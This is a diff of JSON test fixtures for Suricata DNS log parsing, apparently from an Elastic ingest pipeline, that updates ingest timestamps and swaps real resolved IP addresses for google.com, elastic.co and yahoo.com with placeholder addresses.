@@ -114,7 +114,7 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853383600Z", + "ingested": "2021-12-09T13:45:26.597827300Z", "original": "{\"timestamp\":\"2019-08-22T23:48:27.924282+0000\",\"flow_id\":1418448010418810,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.15\",\"src_port\":36993,\"dest_ip\":\"10.0.2.3\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":39523,\"rrname\":\"google.com\",\"rrtype\":\"AAAA\",\"tx_id\":0}}", "category": [ "network" @@ -134,7 +134,7 @@ "dns": { "response_code": "NOERROR", "resolved_ip": [ - "2607:f8b0:4006:0805:0000:0000:0000:200e" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ], "question": { "name": "google.com", @@ -145,7 +145,7 @@ "answers": [ { "name": "google.com", - "data": "2607:f8b0:4006:0805:0000:0000:0000:200e", + "data": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "type": "AAAA", "ttl": 272 } @@ -175,7 +175,7 @@ }, "related": { "ip": [ - "2607:f8b0:4006:0805:0000:0000:0000:200e", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "10.0.2.3" ] }, 
@@ -194,8 +194,8 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853388500Z", - "original": "{\"timestamp\":\"2019-08-22T23:48:27.950946+0000\",\"flow_id\":1418448010418810,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":36993,\"proto\":\"UDP\",\"dns\":{\"version\":2,\"type\":\"answer\",\"id\":39523,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"google.com\",\"rrtype\":\"AAAA\",\"answers\":[{\"rrname\":\"google.com\",\"rrtype\":\"AAAA\",\"ttl\":272,\"rdata\":\"2607:f8b0:4006:0805:0000:0000:0000:200e\"}],\"grouped\":{\"AAAA\":[\"2607:f8b0:4006:0805:0000:0000:0000:200e\"]}}}", + "ingested": "2021-12-09T13:45:26.597894Z", + "original": "{\"timestamp\":\"2019-08-22T23:48:27.950946+0000\",\"flow_id\":1418448010418810,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":36993,\"proto\":\"UDP\",\"dns\":{\"version\":2,\"type\":\"answer\",\"id\":39523,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"google.com\",\"rrtype\":\"AAAA\",\"answers\":[{\"rrname\":\"google.com\",\"rrtype\":\"AAAA\",\"ttl\":272,\"rdata\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"}],\"grouped\":{\"AAAA\":[\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"]}}}", "category": [ "network" ], @@ -214,7 +214,7 @@ "dns": { "response_code": "NOERROR", "resolved_ip": [ - "172.217.11.46" + "175.16.199.1" ], "question": { "name": "google.com", @@ -225,7 +225,7 @@ "answers": [ { "name": "google.com", - "data": "172.217.11.46", + "data": "175.16.199.1", "type": "A", "ttl": 299 } @@ -255,7 +255,7 @@ }, "related": { "ip": [ - "172.217.11.46", + "175.16.199.1", "10.0.2.3" ] }, 
@@ -274,8 +274,8 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853392400Z", - "original": "{\"timestamp\":\"2019-08-22T23:48:27.957906+0000\",\"flow_id\":885455453886936,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":46686,\"proto\":\"UDP\",\"dns\":{\"version\":2,\"type\":\"answer\",\"id\":51803,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"google.com\",\"rrtype\":\"A\",\"answers\":[{\"rrname\":\"google.com\",\"rrtype\":\"A\",\"ttl\":299,\"rdata\":\"172.217.11.46\"}],\"grouped\":{\"A\":[\"172.217.11.46\"]}}}", + "ingested": "2021-12-09T13:45:26.597898300Z", + "original": "{\"timestamp\":\"2019-08-22T23:48:27.957906+0000\",\"flow_id\":885455453886936,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":46686,\"proto\":\"UDP\",\"dns\":{\"version\":2,\"type\":\"answer\",\"id\":51803,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"google.com\",\"rrtype\":\"A\",\"answers\":[{\"rrname\":\"google.com\",\"rrtype\":\"A\",\"ttl\":299,\"rdata\":\"175.16.199.1\"}],\"grouped\":{\"A\":[\"175.16.199.1\"]}}}", "category": [ "network" ], @@ -338,7 +338,7 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853411800Z", + "ingested": "2021-12-09T13:45:26.597902800Z", "original": "{\"timestamp\":\"2019-08-22T23:48:48.839495+0000\",\"flow_id\":40074894954311,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.15\",\"src_port\":50720,\"dest_ip\":\"10.0.2.3\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":60273,\"rrname\":\"www.elastic.co\",\"rrtype\":\"A\",\"tx_id\":0}}", "category": [ "network" 
@@ -402,7 +402,7 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853419Z", + "ingested": "2021-12-09T13:45:26.597914700Z", "original": "{\"timestamp\":\"2019-08-22T23:48:48.839714+0000\",\"flow_id\":2130691028471842,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.15\",\"src_port\":41979,\"dest_ip\":\"10.0.2.3\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":4210,\"rrname\":\"www.elastic.co\",\"rrtype\":\"AAAA\",\"tx_id\":0}}", "category": [ "network" @@ -422,10 +422,10 @@ "dns": { "response_code": "NOERROR", "resolved_ip": [ - "151.101.130.217", - "151.101.194.217", - "151.101.2.217", - "151.101.66.217" + "175.16.199.1", + "175.16.199.1", + "175.16.199.1", + "175.16.199.1" ], "question": { "name": "www.elastic.co", @@ -443,25 +443,25 @@ }, { "name": "dualstack.r2.shared.global.fastly.net", - "data": "151.101.130.217", + "data": "175.16.199.1", "type": "A", "ttl": 29 }, { "name": "dualstack.r2.shared.global.fastly.net", - "data": "151.101.194.217", + "data": "175.16.199.1", "type": "A", "ttl": 29 }, { "name": "dualstack.r2.shared.global.fastly.net", - "data": "151.101.2.217", + "data": "175.16.199.1", "type": "A", "ttl": 29 }, { "name": "dualstack.r2.shared.global.fastly.net", - "data": "151.101.66.217", + "data": "175.16.199.1", "type": "A", "ttl": 29 } @@ -491,10 +491,7 @@ }, "related": { "ip": [ - "151.101.130.217", - "151.101.194.217", - "151.101.2.217", - "151.101.66.217", + "175.16.199.1", "10.0.2.3" ] }, 
@@ -513,8 +510,8 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853423800Z", - "original": "{\"timestamp\":\"2019-08-22T23:48:48.901548+0000\",\"flow_id\":40074894954311,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":50720,\"proto\":\"UDP\",\"dns\":{\"version\":2,\"type\":\"answer\",\"id\":60273,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"www.elastic.co\",\"rrtype\":\"A\",\"answers\":[{\"rrname\":\"www.elastic.co\",\"rrtype\":\"CNAME\",\"ttl\":270,\"rdata\":\"dualstack.r2.shared.global.fastly.net\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"151.101.130.217\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"151.101.194.217\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"151.101.2.217\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"151.101.66.217\"}],\"grouped\":{\"A\":[\"151.101.130.217\",\"151.101.194.217\",\"151.101.2.217\",\"151.101.66.217\"],\"CNAME\":[\"dualstack.r2.shared.global.fastly.net\"]}}}", + "ingested": "2021-12-09T13:45:26.597919500Z", + "original": 
"{\"timestamp\":\"2019-08-22T23:48:48.901548+0000\",\"flow_id\":40074894954311,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":50720,\"proto\":\"UDP\",\"dns\":{\"version\":2,\"type\":\"answer\",\"id\":60273,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"www.elastic.co\",\"rrtype\":\"A\",\"answers\":[{\"rrname\":\"www.elastic.co\",\"rrtype\":\"CNAME\",\"ttl\":270,\"rdata\":\"dualstack.r2.shared.global.fastly.net\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"175.16.199.1\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"175.16.199.1\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"175.16.199.1\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"A\",\"ttl\":29,\"rdata\":\"175.16.199.1\"}],\"grouped\":{\"A\":[\"175.16.199.1\",\"175.16.199.1\",\"175.16.199.1\",\"175.16.199.1\"],\"CNAME\":[\"dualstack.r2.shared.global.fastly.net\"]}}}", "category": [ "network" ], @@ -533,8 +530,8 @@ "dns": { "response_code": "NOERROR", "resolved_ip": [ - "2a04:4e42:0600:0000:0000:0000:0000:0729", - "2a04:4e42:0000:0000:0000:0000:0000:0729", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "2a04:4e42:0200:0000:0000:0000:0000:0729", "2a04:4e42:0400:0000:0000:0000:0000:0729" ], @@ -554,13 +551,13 @@ }, { "name": "dualstack.r2.shared.global.fastly.net", - "data": "2a04:4e42:0600:0000:0000:0000:0000:0729", + "data": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "type": "AAAA", "ttl": 29 }, { "name": "dualstack.r2.shared.global.fastly.net", - "data": "2a04:4e42:0000:0000:0000:0000:0000:0729", + "data": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "type": "AAAA", "ttl": 29 }, 
@@ -602,8 +599,7 @@ }, "related": { "ip": [ - "2a04:4e42:0600:0000:0000:0000:0000:0729", - "2a04:4e42:0000:0000:0000:0000:0000:0729", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "2a04:4e42:0200:0000:0000:0000:0000:0729", "2a04:4e42:0400:0000:0000:0000:0000:0729", "10.0.2.3" 
@@ -624,8 +620,8 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853427900Z", - "original": "{\"timestamp\":\"2019-08-22T23:48:48.902685+0000\",\"flow_id\":2130691028471842,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":41979,\"proto\":\"UDP\",\"dns\":{\"version\":2,\"type\":\"answer\",\"id\":4210,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"www.elastic.co\",\"rrtype\":\"AAAA\",\"answers\":[{\"rrname\":\"www.elastic.co\",\"rrtype\":\"CNAME\",\"ttl\":299,\"rdata\":\"dualstack.r2.shared.global.fastly.net\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a04:4e42:0600:0000:0000:0000:0000:0729\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a04:4e42:0000:0000:0000:0000:0000:0729\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a04:4e42:0200:0000:0000:0000:0000:0729\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a04:4e42:0400:0000:0000:0000:0000:0729\"}],\"grouped\":{\"AAAA\":[\"2a04:4e42:0600:0000:0000:0000:0000:0729\",\"2a04:4e42:0000:0000:0000:0000:0000:0729\",\"2a04:4e42:0200:0000:0000:0000:0000:0729\",\"2a04:4e42:0400:0000:0000:0000:0000:0729\"],\"CNAME\":[\"dualstack.r2.shared.global.fastly.net\"]}}}", + "ingested": "2021-12-09T13:45:26.597924700Z", + "original": 
"{\"timestamp\":\"2019-08-22T23:48:48.902685+0000\",\"flow_id\":2130691028471842,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":41979,\"proto\":\"UDP\",\"dns\":{\"version\":2,\"type\":\"answer\",\"id\":4210,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"www.elastic.co\",\"rrtype\":\"AAAA\",\"answers\":[{\"rrname\":\"www.elastic.co\",\"rrtype\":\"CNAME\",\"ttl\":299,\"rdata\":\"dualstack.r2.shared.global.fastly.net\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a04:4e42:0200:0000:0000:0000:0000:0729\"},{\"rrname\":\"dualstack.r2.shared.global.fastly.net\",\"rrtype\":\"AAAA\",\"ttl\":29,\"rdata\":\"2a04:4e42:0400:0000:0000:0000:0000:0729\"}],\"grouped\":{\"AAAA\":[\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"2a04:4e42:0200:0000:0000:0000:0000:0729\",\"2a04:4e42:0400:0000:0000:0000:0000:0729\"],\"CNAME\":[\"dualstack.r2.shared.global.fastly.net\"]}}}", "category": [ "network" ], @@ -688,7 +684,7 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853431500Z", + "ingested": "2021-12-09T13:45:26.597931Z", "original": "{\"timestamp\":\"2019-08-23T01:22:31.812655+0000\",\"flow_id\":814378410010223,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.15\",\"src_port\":44773,\"dest_ip\":\"10.0.2.3\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":28329,\"rrname\":\"www.yahoo.com\",\"rrtype\":\"A\",\"tx_id\":0}}", "category": [ "network" 
@@ -752,7 +748,7 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853449200Z", + "ingested": "2021-12-09T13:45:26.597936600Z", "original": "{\"timestamp\":\"2019-08-23T01:22:31.812828+0000\",\"flow_id\":1887239765714716,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.15\",\"src_port\":55246,\"dest_ip\":\"10.0.2.3\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":7050,\"rrname\":\"www.yahoo.com\",\"rrtype\":\"AAAA\",\"tx_id\":0}}", "category": [ "network" @@ -829,7 +825,7 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853454500Z", + "ingested": "2021-12-09T13:45:26.597942100Z", "original": "{\"timestamp\":\"2019-08-23T01:22:31.846575+0000\",\"flow_id\":814378410010223,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":44773,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":28329,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"www.yahoo.com\",\"rrtype\":\"CNAME\",\"ttl\":1315,\"rdata\":\"atsv2-fp-shed.wg1.b.yahoo.com\"}}", "category": [ "network" @@ -849,7 +845,7 @@ "dns": { "response_code": "NOERROR", "resolved_ip": [ - "98.138.219.232" + "175.16.199.1" ], "question": { "top_level_domain": "com", @@ -859,7 +855,7 @@ "answers": [ { "name": "atsv2-fp-shed.wg1.b.yahoo.com", - "data": "98.138.219.232", + "data": "175.16.199.1", "type": "A", "ttl": 15 } @@ -889,7 +885,7 @@ }, "related": { "ip": [ - "98.138.219.232", + "175.16.199.1", "10.0.2.3" ] }, @@ -898,7 +894,7 @@ "in_iface": "enp0s3", "dns": { "rrname": "atsv2-fp-shed.wg1.b.yahoo.com", - "rdata": "98.138.219.232", + "rdata": "175.16.199.1", "rcode": "NOERROR", "id": 28329, "type": "answer", 
@@ -910,8 +906,8 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853459500Z", - "original": "{\"timestamp\":\"2019-08-23T01:22:31.846575+0000\",\"flow_id\":814378410010223,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":44773,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":28329,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"A\",\"ttl\":15,\"rdata\":\"98.138.219.232\"}}", + "ingested": "2021-12-09T13:45:26.597947500Z", + "original": "{\"timestamp\":\"2019-08-23T01:22:31.846575+0000\",\"flow_id\":814378410010223,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":44773,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":28329,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"A\",\"ttl\":15,\"rdata\":\"175.16.199.1\"}}", "category": [ "network" ], @@ -930,7 +926,7 @@ "dns": { "response_code": "NOERROR", "resolved_ip": [ - "98.138.219.231" + "175.16.199.1" ], "question": { "top_level_domain": "com", @@ -940,7 +936,7 @@ "answers": [ { "name": "atsv2-fp-shed.wg1.b.yahoo.com", - "data": "98.138.219.231", + "data": "175.16.199.1", "type": "A", "ttl": 15 } @@ -970,7 +966,7 @@ }, "related": { "ip": [ - "98.138.219.231", + "175.16.199.1", "10.0.2.3" ] }, @@ -979,7 +975,7 @@ "in_iface": "enp0s3", "dns": { "rrname": "atsv2-fp-shed.wg1.b.yahoo.com", - "rdata": "98.138.219.231", + "rdata": "175.16.199.1", "rcode": "NOERROR", "id": 28329, "type": "answer", 
@@ -991,8 +987,8 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853463400Z", - "original": "{\"timestamp\":\"2019-08-23T01:22:31.846575+0000\",\"flow_id\":814378410010223,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":44773,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":28329,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"A\",\"ttl\":15,\"rdata\":\"98.138.219.231\"}}", + "ingested": "2021-12-09T13:45:26.597953900Z", + "original": "{\"timestamp\":\"2019-08-23T01:22:31.846575+0000\",\"flow_id\":814378410010223,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":44773,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":28329,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"A\",\"ttl\":15,\"rdata\":\"175.16.199.1\"}}", "category": [ "network" ], @@ -1011,7 +1007,7 @@ "dns": { "response_code": "NOERROR", "resolved_ip": [ - "72.30.35.10" + "175.16.199.1" ], "question": { "top_level_domain": "com", @@ -1021,7 +1017,7 @@ "answers": [ { "name": "atsv2-fp-shed.wg1.b.yahoo.com", - "data": "72.30.35.10", + "data": "175.16.199.1", "type": "A", "ttl": 15 } @@ -1051,7 +1047,7 @@ }, "related": { "ip": [ - "72.30.35.10", + "175.16.199.1", "10.0.2.3" ] }, @@ -1060,7 +1056,7 @@ "in_iface": "enp0s3", "dns": { "rrname": "atsv2-fp-shed.wg1.b.yahoo.com", - "rdata": "72.30.35.10", + "rdata": "175.16.199.1", "rcode": "NOERROR", "id": 28329, "type": "answer", 
@@ -1072,8 +1068,8 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853467Z", - "original": "{\"timestamp\":\"2019-08-23T01:22:31.846575+0000\",\"flow_id\":814378410010223,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":44773,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":28329,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"A\",\"ttl\":15,\"rdata\":\"72.30.35.10\"}}", + "ingested": "2021-12-09T13:45:26.597958900Z", + "original": "{\"timestamp\":\"2019-08-23T01:22:31.846575+0000\",\"flow_id\":814378410010223,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":44773,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":28329,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"A\",\"ttl\":15,\"rdata\":\"175.16.199.1\"}}", "category": [ "network" ], @@ -1092,7 +1088,7 @@ "dns": { "response_code": "NOERROR", "resolved_ip": [ - "72.30.35.9" + "175.16.199.1" ], "question": { "top_level_domain": "com", @@ -1102,7 +1098,7 @@ "answers": [ { "name": "atsv2-fp-shed.wg1.b.yahoo.com", - "data": "72.30.35.9", + "data": "175.16.199.1", "type": "A", "ttl": 15 } @@ -1132,7 +1128,7 @@ }, "related": { "ip": [ - "72.30.35.9", + "175.16.199.1", "10.0.2.3" ] }, @@ -1141,7 +1137,7 @@ "in_iface": "enp0s3", "dns": { "rrname": "atsv2-fp-shed.wg1.b.yahoo.com", - "rdata": "72.30.35.9", + "rdata": "175.16.199.1", "rcode": "NOERROR", "id": 28329, "type": "answer", 
@@ -1153,8 +1149,8 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853474900Z", - "original": "{\"timestamp\":\"2019-08-23T01:22:31.846575+0000\",\"flow_id\":814378410010223,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":44773,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":28329,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"A\",\"ttl\":15,\"rdata\":\"72.30.35.9\"}}", + "ingested": "2021-12-09T13:45:26.597964700Z", + "original": "{\"timestamp\":\"2019-08-23T01:22:31.846575+0000\",\"flow_id\":814378410010223,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":44773,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":28329,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"A\",\"ttl\":15,\"rdata\":\"175.16.199.1\"}}", "category": [ "network" ], @@ -1230,7 +1226,7 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853479Z", + "ingested": "2021-12-09T13:45:26.597969800Z", "original": "{\"timestamp\":\"2019-08-23T01:22:31.847379+0000\",\"flow_id\":1887239765714716,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":55246,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":7050,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"www.yahoo.com\",\"rrtype\":\"CNAME\",\"ttl\":1268,\"rdata\":\"atsv2-fp-shed.wg1.b.yahoo.com\"}}", "category": [ "network" @@ -1250,7 +1246,7 @@ "dns": { "response_code": "NOERROR", "resolved_ip": [ - "2001:4998:0058:1836:0000:0000:0000:0010" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ], "question": { "top_level_domain": "com", 
@@ -1260,7 +1256,7 @@ "answers": [ { "name": "atsv2-fp-shed.wg1.b.yahoo.com", - "data": "2001:4998:0058:1836:0000:0000:0000:0010", + "data": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "type": "AAAA", "ttl": 53 } @@ -1290,7 +1286,7 @@ }, "related": { "ip": [ - "2001:4998:0058:1836:0000:0000:0000:0010", + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "10.0.2.3" ] }, @@ -1299,7 +1295,7 @@ "in_iface": "enp0s3", "dns": { "rrname": "atsv2-fp-shed.wg1.b.yahoo.com", - "rdata": "2001:4998:0058:1836:0000:0000:0000:0010", + "rdata": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6", "rcode": "NOERROR", "id": 7050, "type": "answer", @@ -1311,8 +1307,8 @@ } }, "event": { - "ingested": "2021-07-05T10:52:44.853482600Z", - "original": "{\"timestamp\":\"2019-08-23T01:22:31.847379+0000\",\"flow_id\":1887239765714716,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":55246,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":7050,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"AAAA\",\"ttl\":53,\"rdata\":\"2001:4998:0058:1836:0000:0000:0000:0010\"}}", + "ingested": "2021-12-09T13:45:26.597975700Z", + "original": "{\"timestamp\":\"2019-08-23T01:22:31.847379+0000\",\"flow_id\":1887239765714716,\"in_iface\":\"enp0s3\",\"event_type\":\"dns\",\"src_ip\":\"10.0.2.3\",\"src_port\":53,\"dest_ip\":\"10.0.2.15\",\"dest_port\":55246,\"proto\":\"UDP\",\"dns\":{\"type\":\"answer\",\"id\":7050,\"flags\":\"8180\",\"qr\":true,\"rd\":true,\"ra\":true,\"rcode\":\"NOERROR\",\"rrname\":\"atsv2-fp-shed.wg1.b.yahoo.com\",\"rrtype\":\"AAAA\",\"ttl\":53,\"rdata\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\"}}", "category": [ "network" ], @@ -1331,7 +1327,7 @@ "dns": { "response_code": "NOERROR", "resolved_ip": [ - "2001:4998:0044:041d:0000:0000:0000:0003" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ], "question": { "top_level_domain": "com", 
